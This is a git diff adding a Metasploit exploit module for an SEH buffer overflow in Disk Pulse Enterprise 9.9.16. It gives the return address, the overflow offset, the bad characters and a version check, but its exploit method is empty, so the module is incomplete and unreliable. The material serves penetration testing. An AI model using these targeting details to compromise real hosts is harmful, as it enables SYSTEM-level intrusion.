diff --git a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb new file mode 100644 index 0000000000..c3f326feb5 --- /dev/null +++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Egghunter + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Pulse Enterprise Login Buffer Overflow', + 'Description' => %q{ + This module exploits an SEH buffer overflow in Disk Pulse Enterprise + 9.9.16. If a malicious user sends a malicious HTTP GET request, + it is possible to execute a payload that would run under the Windows + NT AUTHORITY\SYSTEM account. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chance Johnson', # module - hackback.sh - albatross@loftwing.net + 'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com + ], + 'References' => + [ + [ 'EDB', '42560' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'none' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x26" + }, + 'Targets' => + [ + [ 'Disk Pulse Enterprise 9.9.16', + { + 'Ret' => 0x10013AAA, # pop ebp # pop ebx # ret 0x04 - libspp.dll + 'Offset' => 12600 + } + ], + ], + 'Privileged' => true, + 'DisclosureDate' => 'Oct 03 2016', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(80)], self.class) + + end + + def check + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET' + }) + + if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + + + end +end \ No newline at end of file